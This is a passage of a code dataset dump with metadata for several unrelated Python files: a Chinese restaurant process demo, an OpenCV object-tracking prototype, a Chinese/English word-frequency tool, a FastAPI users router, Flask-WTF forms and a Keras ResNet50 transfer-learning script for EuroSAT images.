ax[i].xaxis.set_major_locator(MaxNLocator(integer=True))\n\nplot_itr = 0\n\nfor itr in range(1, 100):\n cluster_ids = [cl_id for cl_id in urn_contents.keys()]\n ball_chosen = choice(cluster_ids, p=normalize(urn_contents))\n if ball_chosen == 0:\n # add new ball\n urn_contents[cluster_counter] = 1\n cluster_counter += 1\n else:\n urn_contents[ball_chosen] += 1\n\n if itr % 25 == 0:\n ax[plot_itr].bar(urn_contents.keys(), urn_contents.values())\n ax[plot_itr].set_title('CRP with {} iterations'.format(itr))\n ax[plot_itr].set_xlabel('Component number')\n ax[plot_itr].set_ylabel('# of points')\n plot_itr += 1\n\nplt.show()\n", "sub_path": "Dirichlet_process/crp.py", "file_name": "crp.py", "file_ext": "py", "file_size_in_byte": 1495, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "numpy.sum", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.ticker.MaxNLocator", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}]} +{"seq_id": "25356284", "text": "from GT_Analyse import getGroundTruth\nfrom collections import deque\nimport cv2\nimport utils_iou as utils\nfrom utils_iou import createTracker\n#import scripts.recognizer as rec\nfrom collections import Counter\nimport sys\nimport time\n\n'''\nAnnotate the frame with 'tracking' and 'detecting'.\nWhen doing detecting, the frame freeze, and will jump to the latest frame after detecting\n\nJuly 21, 2020\n'''\n\ndef runDetection(r, img):\n rs = r.recognizeNP(img)\n ds = []\n for i, r in enumerate(rs[0]):\n ds.append(utils.BoundingBox(r, rs[2][i]))\n return ds\n\ndef retrieveGroundTruth(ob_idxs, objs, fid):\n ret = []\n cls = 'person'\n for ob in ob_idxs:\n ret.append(utils.BoundingBox(cls, objs[ob].trajectory[objs[ob].frames.index(fid)], ob))\n return ret\n\ndef BB2Str(bb):\n return '%d %d %d %d'%(bb.box[0], bb.box[1], bb.box[2], bb.box[3])\n\nif __name__ == '__main__' :\n\n #rc = rec.Recognizer('ssd_mobilenet_v1_coco_2018_01_28')\n #rc = rec.Recognizer()\n SLEEP_TIME = 0#0.5\n\n n = 10 #the size of the matrix\n lag = 4\n matrix = [[(0, 0)] * (lag + 1) for _ in range(n + 1)] #every element of the matrix will be (average_precision, number_of_frames)\n \n #set up file paths\n VIDEO = sys.argv[1] if len(sys.argv) > 1 else 'basketball'\n #VIDEO = 'india'\n #VIDEO = 'basketball'\n #VIDEO = 'biking'\n #VIDEO = 'output'\n\n FILE_NAME = 'gt_basketball_fps_10_0-130.txt' if VIDEO == 'basketball' else 'gt_india_fps_10_0-130.txt' if VIDEO == 'india' else 'gt_biking_fps_10_0-130.txt'\n #FILE_NAME = 'gt_basketball_fps_10_0-130.txt'\n #FILE_NAME = 'gt_india_fps_10_0-130.txt'\n\n #set up the number of frames the tracker should track\n FPS = 10\n INTERVAL = 1000 / FPS\n KEEP_OD = len(sys.argv) > 2\n GAP = 1 if KEEP_OD else 4 #For GAP, it means the number of frame between two detection, which is inclusive\n\n #start to use KEEP_OD after those frames\n START = lag\n gts = []\n\n #choose tracker\n tracker_types = ['BOOSTING', 'MIL','KCF', 'TLD', 'MEDIANFLOW', 'GOTURN', 'MOSSE', 'CSRT']\n tracker_type = tracker_types[2]\n\n # Read video\n video = cv2.VideoCapture(\"test_data/\" + VIDEO + \".mp4\")\n \n # Exit if video not opened.\n if not video.isOpened():\n print(\"Could not open video\")\n sys.exit()\n \n #Trackers\n trackers = deque()\n \n ct = 0\n record = 0\n\n frames, objs = getGroundTruth(FILE_NAME)\n old_frame = 0\n\n while True:\n time.sleep(SLEEP_TIME)\n ct += 1\n video.set(cv2.CAP_PROP_POS_MSEC, ct * INTERVAL)\n\n # Read a new frame\n ok, frame = video.read()\n if not ok:\n print('Cannot read video file or video ends')\n break\n \n #create ground truth\n #gts = [runDetection(rc, frame)] + gts\n gts = [retrieveGroundTruth(frames[ct], objs, ct)] + gts\n\n if len(gts) > lag + 1:\n gts.pop()\n\n gt = gts[-1] #all trackers are initialized with stale object position\n\n dif = ct - record\n tmp = []\n if dif <= lag:\n if ct > lag: \n frame = old_frame.copy()\n cv2.putText(frame, str(ct) + \" detecting\", (100,50), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (50,170,50), 2);\n elif dif <= GAP + lag:\n if dif == lag + 1 and gt:\n if GAP > 1:\n trackers = []\n for g in gt:\n if g.cls != 'person': #only test person\n continue\n t = createTracker(tracker_type)\n box = list(g.box)\n box[2] -= box[0]\n box[3] -= box[1]\n t.init(old_frame, tuple(box))\n trackers.append(t)\n tmp = gt\n else:\n #average number of trackers is 9.8 for basketball\n #print(len(trackers))\n for t in trackers:\n #tracker update 16.35ms\n #start_time = time.time()\n ok, bx = t.update(frame)\n #print((time.time() - start_time) * 1000)\n if ok:\n bx = list(bx)\n bx[2], bx[3] = bx[0] + bx[2], bx[1] + bx[3]\n tmp.append(utils.BoundingBox('person', tuple(bx)))\n if dif == GAP + lag:\n old_frame = frame.copy()\n cv2.putText(frame, str(ct) + \" tracking \", (100,50), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (50,170,50), 2);\n for ti in tmp:\n p1 = (int(ti.box[0]), int(ti.box[1]))\n p2 = (int(ti.box[2]), int(ti.box[3]))\n cv2.rectangle(frame, p1, p2, (255,0,0), 2, 1)\n\n\n if ct - record >= GAP + lag:\n record = ct\n\n # Display result\n cv2.imshow(\"Tracking\", frame)\n # Exit if ESC pressed\n k = cv2.waitKey(1) & 0xff\n if k == 27 : break\n\n", "sub_path": "tracking_proto.py", "file_name": "tracking_proto.py", "file_ext": "py", "file_size_in_byte": 4955, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "utils_iou.BoundingBox", "line_number": 22, "usage_type": "call"}, {"api_name": "utils_iou.BoundingBox", "line_number": 29, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 46, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 59, "usage_type": "attribute"}, {"api_name": "cv2.VideoCapture", "line_number": 71, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 76, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 79, "usage_type": "call"}, {"api_name": "GT_Analyse.getGroundTruth", "line_number": 84, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 88, "usage_type": "call"}, {"api_name": "cv2.CAP_PROP_POS_MSEC", "line_number": 90, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 112, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 112, "usage_type": "attribute"}, {"api_name": "utils_iou.createTracker", "line_number": 120, "usage_type": "call"}, {"api_name": "utils_iou.BoundingBox", "line_number": 138, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 141, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 141, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 145, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 152, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 154, "usage_type": "call"}]} +{"seq_id": "411335495", "text": "# encoding = utf-8\nimport jieba\nimport jieba.posseg as jbp\nfrom collections import Counter\nimport nltk\nimport string\nimport re\nfrom nltk.corpus import stopwords\nfrom nltk.probability import FreqDist\nimport collections\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk import word_tokenize, pos_tag\nfrom nltk.corpus import wordnet\n\n\n# 频率统计\n# @author LELE,LU\ndef word_count(datalist):\n c = Counter()\n word_list = []\n for x in datalist:\n if len(x[\"word\"]) > 1:\n c[x[\"word\"]] += 1\n for (k, v) in c.most_common():\n key = jbp.cut(k)\n for x in key:\n word_str = \"\"\n var = str(v)\n # print(type(var))\n word_dict = dict(word=k, count=v, word_type=x.flag)\n word_str = word_dict[\"word\"] + \"+\" + word_dict[\"word_type\"] + \"+\" + var\n word_list.append(word_str)\n return word_list\n\n\n# 中文分词\ndef chinese_cut(file_name):\n chg_4 = []\n chg_6 = []\n for c in open(\"chg4.txt\", encoding=\"gbk\"):\n if c != ' ':\n chg_4.append(c.strip(\"\\n\"))\n for c in open(\"chg6.txt\", encoding=\"gbk\"):\n if c != ' ':\n chg_6.append(c.strip(\"\\n\"))\n keyword_list = []\n # 停用词列表\n stop_word_list = []\n # 加载停用词\n for word in open(\"stop_words.txt\"):\n stop_word_list.append(word.strip(\"\\n\"))\n with open(file_name, encoding=\"utf-8\") as f:\n data = f.read()\n for x in jbp.cut(data):\n if x.flag != 'x' and x.flag != 'm' and x.word not in stop_word_list:\n # print(x.word, x.flag)\n word_dict = dict(word=x.word, word_type=x.flag, count=1)\n if x.word in chg_4:\n word_dict[\"level\"] = \"四级\"\n elif x.word in chg_6:\n word_dict[\"level\"] = \"六级\"\n else:\n word_dict[\"level\"] = \"其他\"\n keyword_list.append(word_dict)\n return keyword_list\n\n\n# 获取词性\ndef get_wordnet_pos(tag):\n if tag.startswith('J'):\n return wordnet.ADJ\n elif tag.startswith('V'):\n return wordnet.VERB\n elif tag.startswith('N'):\n return wordnet.NOUN\n elif tag.startswith('R'):\n return wordnet.ADV\n else:\n return None\n\n\n# 英文分词\ndef english_cut(file_name):\n word_list = []\n final_word = []\n words_list = []\n # 四级英语词表\n wnl = WordNetLemmatizer()\n eng_4 = []\n eng_6 = []\n for e in open(\"eng4.txt\", encoding='ISO8859-1'):\n if e != \" \":\n eng_4.append(e.strip(\"\\n\"))\n for e in open(\"eng6.txt\", encoding='ISO8859-1'):\n if e != \" \":\n eng_6.append(e.strip(\"\\n\"))\n # print(eng_4)\n with open(file_name, \"r\") as f:\n data = f.read()\n rule = re.compile(\"[0-9.?!,]\")\n data = rule.sub('', data)\n # 进入队列\n old_words = nltk.word_tokenize(data)\n for w in old_words:\n word_list.append(w)\n # 去除停用字和缩写\n filter_words = [word for word in word_list if\n word not in stopwords.words('english') and word != \"'s\" and word != \"'\"]\n # print(filter_words)\n final_word = nltk.pos_tag(filter_words)\n for x in set(final_word):\n c = final_word.count(x)\n # 单词还原\n word_post = get_wordnet_pos(x[1]) or wordnet.NOUN\n original_word = wnl.lemmatize(x[0], pos=word_post)\n # print(original_word)\n word_dict = dict(word=original_word, word_type=x[1], count=c)\n if x[0] in eng_4:\n word_dict[\"level\"] = \"四级\"\n elif x[0] in eng_6:\n word_dict[\"level\"] = \"六级\"\n else:\n word_dict[\"level\"] = \"其他\"\n words_list.append(word_dict)\n # print(words_list)\n return words_list\n\n\ndef write_txt(file_name,data):\n with open(file_name,'w') as f:\n f.writelines(data)\n\n\nif __name__ == \"__main__\":\n all_words = chinese_cut(\"dirty_data.txt\")+english_cut(\"dirty_data_eng.txt\")\n # all_words = english_cut(\"dirty_data_eng.txt\")\n # print(english_cut(\"dirty_data_eng.txt\"))\n dataset = []\n for words in all_words:\n data = words[\"word\"]+\"+\"+words[\"word_type\"]+\"+\"+str(words[\"count\"])+\"+\"+words[\"level\"]+\"\\n\"\n dataset.append(data)\n write_txt(\"dataset.txt\",dataset)\n print(all_words)\n", "sub_path": "before/wordSolve/wordutil.py", "file_name": "wordutil.py", "file_ext": "py", "file_size_in_byte": 4438, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "collections.Counter", "line_number": 19, "usage_type": "call"}, {"api_name": "jieba.posseg.cut", "line_number": 25, "usage_type": "call"}, {"api_name": "jieba.posseg", "line_number": 25, "usage_type": "name"}, {"api_name": "jieba.posseg.cut", "line_number": 54, "usage_type": "call"}, {"api_name": "jieba.posseg", "line_number": 54, "usage_type": "name"}, {"api_name": "nltk.corpus.wordnet.ADJ", "line_number": 71, "usage_type": "attribute"}, {"api_name": "nltk.corpus.wordnet", "line_number": 71, "usage_type": "name"}, {"api_name": "nltk.corpus.wordnet.VERB", "line_number": 73, "usage_type": "attribute"}, {"api_name": "nltk.corpus.wordnet", "line_number": 73, "usage_type": "name"}, {"api_name": "nltk.corpus.wordnet.NOUN", "line_number": 75, "usage_type": "attribute"}, {"api_name": "nltk.corpus.wordnet", "line_number": 75, "usage_type": "name"}, {"api_name": "nltk.corpus.wordnet.ADV", "line_number": 77, "usage_type": "attribute"}, {"api_name": "nltk.corpus.wordnet", "line_number": 77, "usage_type": "name"}, {"api_name": "nltk.stem.WordNetLemmatizer", "line_number": 88, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 100, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 103, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 108, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 108, "usage_type": "name"}, {"api_name": "nltk.pos_tag", "line_number": 110, "usage_type": "call"}, {"api_name": "nltk.corpus.wordnet.NOUN", "line_number": 114, "usage_type": "attribute"}, {"api_name": "nltk.corpus.wordnet", "line_number": 114, "usage_type": "name"}]} +{"seq_id": "200367750", "text": "from fastapi import APIRouter, Depends, HTTPException\nfrom typing import List\n\nfrom .. import models\nfrom ..schemas import schemas\nfrom ..database import SessionLocal\nfrom sqlalchemy.orm import Session\n\n\nfrom ..dependencies import get_current_user\n\n\nrouter = APIRouter(\n prefix=\"/users\",\n tags=[\"users\"],\n dependencies=[Depends(get_current_user)]\n)\n\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n\n\n\n@router.get(\"/\", response_model=List[schemas.User])\nasync def read_users(skip: int = 0, limit: int = 100, db: Session = Depends(get_db)):\n users = db.query(models.User).offset(skip).limit(limit).all()\n return users\n\n\n@router.get(\"/get-files\", response_model=schemas.File)\nasync def read_files(db: Session = Depends(get_db), user_details: schemas.User = Depends(get_current_user)):\n db_files = db.query(models.CloudFile).filter(models.CloudFile.user_id == user_details.id).first()\n if db_files is None:\n raise HTTPException(status_code=404, detail=\"User not found\")\n\n return db_files\n\n", "sub_path": "routers/users.py", "file_name": "users.py", "file_ext": "py", "file_size_in_byte": 1064, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "fastapi.APIRouter", "line_number": 13, "usage_type": "call"}, {"api_name": "fastapi.Depends", "line_number": 16, "usage_type": "call"}, {"api_name": "dependencies.get_current_user", "line_number": 16, "usage_type": "argument"}, {"api_name": "database.SessionLocal", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 29, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 29, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 28, "usage_type": "name"}, {"api_name": "schemas.schemas.User", "line_number": 28, "usage_type": "attribute"}, {"api_name": "schemas.schemas", "line_number": 28, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 35, "usage_type": "name"}, {"api_name": "schemas.schemas.User", "line_number": 35, "usage_type": "attribute"}, {"api_name": "schemas.schemas", "line_number": 35, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 35, "usage_type": "call"}, {"api_name": "dependencies.get_current_user", "line_number": 35, "usage_type": "argument"}, {"api_name": "fastapi.HTTPException", "line_number": 38, "usage_type": "call"}, {"api_name": "schemas.schemas.File", "line_number": 34, "usage_type": "attribute"}, {"api_name": "schemas.schemas", "line_number": 34, "usage_type": "name"}]} +{"seq_id": "103561739", "text": "from flask import Flask\nfrom flask_wtf import FlaskForm,RecaptchaField#,widgets\nfrom flask_wtf.file import FileAllowed, FileRequired\nfrom wtforms import StringField,SubmitField,TextAreaField,PasswordField,DateTimeField,FileField\nfrom wtforms import SelectMultipleField,IntegerField\nfrom wtforms.validators import Required,DataRequired,Email,Length\n\nfrom werkzeug.utils import secure_filename\nfrom flask_uploads import UploadSet, IMAGES\n\n#Для чекбоксов\nfrom wtforms import widgets\n\nimages = UploadSet('images', IMAGES)\n\n#Форма отправки заказа\nclass OrderMail(FlaskForm):\n\tphone=StringField('Введите Ваш номер телефона*:',validators=[DataRequired()],\n\trender_kw={'Placeholder':'+X(XXX)XXX XX XX'})\n\temail=StringField('Введите Ваш E-mail*:',validators=[Email()],render_kw={'Placeholder':'sample@sample.com'})\n\tdesc=TextAreaField('Краткое описание заказа*',validators=[DataRequired()])\n\tsubmit=SubmitField('Заказать')\n\n#Форма отправки смс\nclass SmsMail(FlaskForm):\n\tphone=StringField('Введите Ваш номер телефона*:',validators=[DataRequired()],\n\trender_kw={'Placeholder':'+X(XXX)XXX XX XX'})\n\tsubmit=SubmitField('Отправить')\n\n#Форма входа\nclass LoginForm(FlaskForm):\n\tlogin=StringField('Логин:',validators=[DataRequired()],render_kw={'Placeholder':'Введите Ваш Логин'})\n\tpassword=PasswordField('Пароль:',validators=[DataRequired()],render_kw={'Placeholder':'Введите Ваш Пароль'})\n\t#recaptcha = RecaptchaField()\n\tsubmit=SubmitField('Войти')\n\n#Форма для редактирования общей информации\nclass AboutForm(FlaskForm):\n\tdtime=date=DateTimeField('Дата текста:', format='%Y-%m-%d %H:%M:%S', validators=[])#DataRequired(),Required()\n\ttext=TextAreaField('Обо мне',validators=[DataRequired()])\n\tsubmit=SubmitField('Сохранить')\n\n#Форма для загрузки файла портфолио\nclass UplFileP(FlaskForm):\n\tfname=FileField('Выберите файл:',validators=[FileAllowed(images, 'Images only!')])\n\tfdesc=StringField('Описание:',validators=[DataRequired()],\n\trender_kw={'Placeholder':'Введите описание файла портфолио'})\n\tsubmit=SubmitField('Загрузить')\n\n#Checkboxes\nclass MultiCheckboxField(SelectMultipleField):\n\twidget=widgets.ListWidget(prefix_label=False)\n\toption_widget=widgets.CheckboxInput()\n\n#Форма для добавления контакта\nclass AddContact(FlaskForm):\n\tcontact=StringField('Введите новый контакт:',validators=[DataRequired(),Required('Введите контакт')])\n\tchoices=[]\n\ticons=MultiCheckboxField('Вид контакта:',choices=choices,coerce=int)\n\tsubmit=SubmitField('Добавить')\n\n#Форма редактирования контакта\nclass EditContact(FlaskForm):\n\tecontact=StringField('Kонтакт:')\n\teid=IntegerField('id',validators=[DataRequired()])\n\techoices=[]\n\teicons=MultiCheckboxField('Вид контакта:',choices=echoices,coerce=int)\n\tesubmit=SubmitField('Сохранить')\n\n#форма добавление иконки\nclass AddIcon(FlaskForm):\n\ticon=FileField('Выберите файл:',validators=[FileAllowed(images, 'Images only!')])\n\tidesc=StringField('Описание:',validators=[DataRequired()], render_kw={'Placeholder':'Введите описание иконки'})\n\tsubmit=SubmitField('Добавить')\n", "sub_path": "forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 3534, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask_uploads.UploadSet", "line_number": 14, "usage_type": "call"}, {"api_name": "flask_uploads.IMAGES", "line_number": 14, "usage_type": "argument"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 17, "usage_type": "name"}, {"api_name": "wtforms.StringField", "line_number": 18, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 18, "usage_type": "call"}, {"api_name": "wtforms.StringField", "line_number": 20, "usage_type": "call"}, {"api_name": "wtforms.validators.Email", "line_number": 20, "usage_type": "call"}, {"api_name": "wtforms.TextAreaField", "line_number": 21, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 21, "usage_type": "call"}, {"api_name": "wtforms.SubmitField", "line_number": 22, "usage_type": "call"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 25, "usage_type": "name"}, {"api_name": "wtforms.StringField", "line_number": 26, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 26, "usage_type": "call"}, {"api_name": "wtforms.SubmitField", "line_number": 28, "usage_type": "call"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 31, "usage_type": "name"}, {"api_name": "wtforms.StringField", "line_number": 32, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 32, "usage_type": "call"}, {"api_name": "wtforms.PasswordField", "line_number": 33, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 33, "usage_type": "call"}, {"api_name": "wtforms.SubmitField", "line_number": 35, "usage_type": "call"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 38, "usage_type": "name"}, {"api_name": "wtforms.DateTimeField", "line_number": 39, "usage_type": "call"}, {"api_name": "wtforms.TextAreaField", "line_number": 40, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 40, "usage_type": "call"}, {"api_name": "wtforms.SubmitField", "line_number": 41, "usage_type": "call"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 44, "usage_type": "name"}, {"api_name": "wtforms.FileField", "line_number": 45, "usage_type": "call"}, {"api_name": "flask_wtf.file.FileAllowed", "line_number": 45, "usage_type": "call"}, {"api_name": "wtforms.StringField", "line_number": 46, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 46, "usage_type": "call"}, {"api_name": "wtforms.SubmitField", "line_number": 48, "usage_type": "call"}, {"api_name": "wtforms.SelectMultipleField", "line_number": 51, "usage_type": "name"}, {"api_name": "wtforms.widgets.ListWidget", "line_number": 52, "usage_type": "call"}, {"api_name": "wtforms.widgets", "line_number": 52, "usage_type": "name"}, {"api_name": "wtforms.widgets.CheckboxInput", "line_number": 53, "usage_type": "call"}, {"api_name": "wtforms.widgets", "line_number": 53, "usage_type": "name"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 56, "usage_type": "name"}, {"api_name": "wtforms.StringField", "line_number": 57, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 57, "usage_type": "call"}, {"api_name": "wtforms.validators.Required", "line_number": 57, "usage_type": "call"}, {"api_name": "wtforms.SubmitField", "line_number": 60, "usage_type": "call"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 63, "usage_type": "name"}, {"api_name": "wtforms.StringField", "line_number": 64, "usage_type": "call"}, {"api_name": "wtforms.IntegerField", "line_number": 65, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 65, "usage_type": "call"}, {"api_name": "wtforms.SubmitField", "line_number": 68, "usage_type": "call"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 71, "usage_type": "name"}, {"api_name": "wtforms.FileField", "line_number": 72, "usage_type": "call"}, {"api_name": "flask_wtf.file.FileAllowed", "line_number": 72, "usage_type": "call"}, {"api_name": "wtforms.StringField", "line_number": 73, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 73, "usage_type": "call"}, {"api_name": "wtforms.SubmitField", "line_number": 74, "usage_type": "call"}]} +{"seq_id": "229456352", "text": "#!/usr/bin/python\r\n# ==============================================================================\r\n# This demonstrate how to use transfer learning using a ResNet50 network.\r\n# Original data from https://arxiv.org/abs/1709.00029\r\n# Etienne Lord - 2019\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n# ==============================================================================\r\nfrom keras.applications.resnet50 import ResNet50\r\nfrom keras.preprocessing import image\r\nfrom keras.applications.resnet50 import preprocess_input, decode_predictions\r\nimport numpy as np\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Conv2D, MaxPooling2D, LeakyReLU\r\nfrom keras.layers import Activation, Dropout, Flatten, Dense,GlobalAveragePooling2D\r\nfrom keras.optimizers import RMSprop\r\nfrom keras.callbacks import *\r\nfrom keras.models import Model\r\nfrom keras import backend as K\r\nfrom pathlib import Path\r\nimport os\r\n\r\n###############################################################################\r\n# HELPER FUNCTIONS\r\n###############################################################################\r\ndef number_of_files(dirname):\r\n\tcpt = sum([len(files) for r, d, files in os.walk(dirname)])\r\n\treturn cpt\r\n\r\n################################################################################ \r\n# DATASETS DEFINITION #\r\n################################################################################\r\ntrain_data_dir = 'EuroSatRGB_training'\r\nvalidation_data_dir = 'EuroSatRGB_validation'\r\ntest_data_dir = 'EuroSatRGB_test'\r\nnb_train_samples=number_of_files(train_data_dir)\r\nnb_validation_samples=number_of_files(validation_data_dir)\r\nnb_test_samples=number_of_files(test_data_dir)\r\n# Training image dimensions\r\nimg_width, img_height = 64, 64\r\n\r\nepochs_pre = 10 # Pre-training epoch \r\nepochs_last = 20 # Complete model epoch\r\nbatch_size = 64 # Batch size (adjust according to your avail. memory)\r\n\r\n################################################################################ \r\n# MODEL DEFINITION #\r\n################################################################################\r\nbase_model = ResNet50(weights='imagenet', include_top=False) #Load the ResNet model\r\n\r\nx = base_model.output\r\nx = GlobalAveragePooling2D()(x)\r\n# Add a fully connected layer\r\nx = Dense(1024, activation='relu')(x)\r\nx = Dropout(0.25)(x)\r\n# and a logistic layer with 10 classes (in our dataset)\r\npredictions = Dense(10, activation='softmax')(x)\r\n\r\n# first: train only the top layers (which were randomly initialized)\r\nfor layer in base_model.layers:\r\n layer.trainable = False\r\n\r\n# Model definitions\r\nmodel = Model(inputs=base_model.input, outputs=predictions)\r\nmodel.summary()\r\n\r\n# Compile the model (should be done *after* setting layers to non-trainable)\r\nmodel.compile(optimizer=RMSprop(lr=0.001), loss='categorical_crossentropy', metrics=['accuracy'])\r\n\r\n################################################################################ \r\n# IMAGES LOADING #\r\n################################################################################\r\n\r\ntrain_datagen = ImageDataGenerator()\r\ntest_datagen = ImageDataGenerator() \r\n\r\n# Note, we could use data augmentation, \r\ntrain_generator = train_datagen.flow_from_directory(\r\n train_data_dir,\r\n target_size=(img_width, img_height),\r\n batch_size=batch_size,\r\n\tshuffle = True,\r\n class_mode='categorical') # Note: the class_mode is categorical\r\n\r\nvalidation_generator = test_datagen.flow_from_directory(\r\n validation_data_dir,\r\n target_size=(img_width, img_height),\r\n\tshuffle = True,\r\n batch_size=batch_size,\r\n class_mode='categorical')\r\n\r\ntest_generator = test_datagen.flow_from_directory(\r\n test_data_dir,\r\n target_size=(img_width, img_height),\r\n batch_size=batch_size,\r\n class_mode='categorical')\r\n\r\nreduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.2,\r\n patience=5, min_lr=0.001)\r\n\r\ntensor=TensorBoard(log_dir='.',histogram_freq=1,embeddings_freq=1,)\r\ncsv_logger = CSVLogger('resnet50_rgb_pre_log.csv', append=True, separator=';')\r\n\r\n################################################################################ \r\n# RUN MODEL (Part 1) #\r\n################################################################################\r\n\r\n# Start the pretraining \r\noriginal_hist=model.fit_generator(\r\n train_generator,\r\n steps_per_epoch=nb_train_samples // batch_size,\r\n epochs=epochs_pre,\r\n verbose=1,\r\n callbacks=[csv_logger],\r\n validation_data=validation_generator,\r\n validation_steps= (nb_validation_samples // batch_size))\r\n\r\nmodel.save('resnet50_rgb_first.hdf5')\r\n# At this point, the top layers are well trained and we can start fine-tuning\r\n# convolutional layers. We will freeze the bottom N layers\r\n# and train the remaining top layers.\r\n\r\n################################################################################ \r\n# RUN MODEL (Part 2) #\r\n################################################################################\r\n\r\nfor layer in model.layers:\r\n layer.trainable = True\r\n\r\nmodel.compile(optimizer=RMSprop(lr=0.0001), loss='categorical_crossentropy', metrics=['accuracy'])\r\nmodel.summary()\r\n\r\ncsv_logger = CSVLogger('resnet50_rgb_last_log.csv', append=True, separator=';')\r\ncheckpointer = ModelCheckpoint(filepath='resnet50_rgb_weights.{epoch:02d}-{val_acc:.2f}.hdf5', verbose=1, save_best_only=True)\r\noriginal_hist2=model.fit_generator(\r\n train_generator,\r\n steps_per_epoch=nb_train_samples // batch_size,\r\n epochs=epochs_last,\r\n verbose=1,\r\n callbacks=[csv_logger,checkpointer],\r\n validation_data=validation_generator,\r\n validation_steps= (nb_validation_samples // batch_size))\r\n\r\nmodel.save(\"resnet50_rgb_end.h5\")\r\n\r\n################################################################################ \r\n# SAVE MODEL #\r\n################################################################################\r\nmodel.save(\"resnet50_rgb_final.hdf5\")\r\n#\r\n# Note: To load model:\r\n# from keras.models import load_model \r\n# model=load_model(\"final_model.hdf5\")\r\n\r\n################################################################################ \r\n# FINAL NOTES #\r\n################################################################################\r\n#\r\n# 1. This demonstrate how to use transfer learning to train. However, we only use \r\n# a very small part of the dataset. Using the full dataset, we can achiever \r\n# > 95% accuracy. \r\n", "sub_path": "Day1/EuroSat_Classification/train_resnet_rgb.py", "file_name": "train_resnet_rgb.py", "file_ext": "py", "file_size_in_byte": 7385, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.walk", "line_number": 38, "usage_type": "call"}, {"api_name": "keras.applications.resnet50.ResNet50", "line_number": 60, "usage_type": "call"}, {"api_name": "keras.layers.GlobalAveragePooling2D", "line_number": 63, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 65, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 66, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 68, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 75, "usage_type": "call"}, {"api_name": 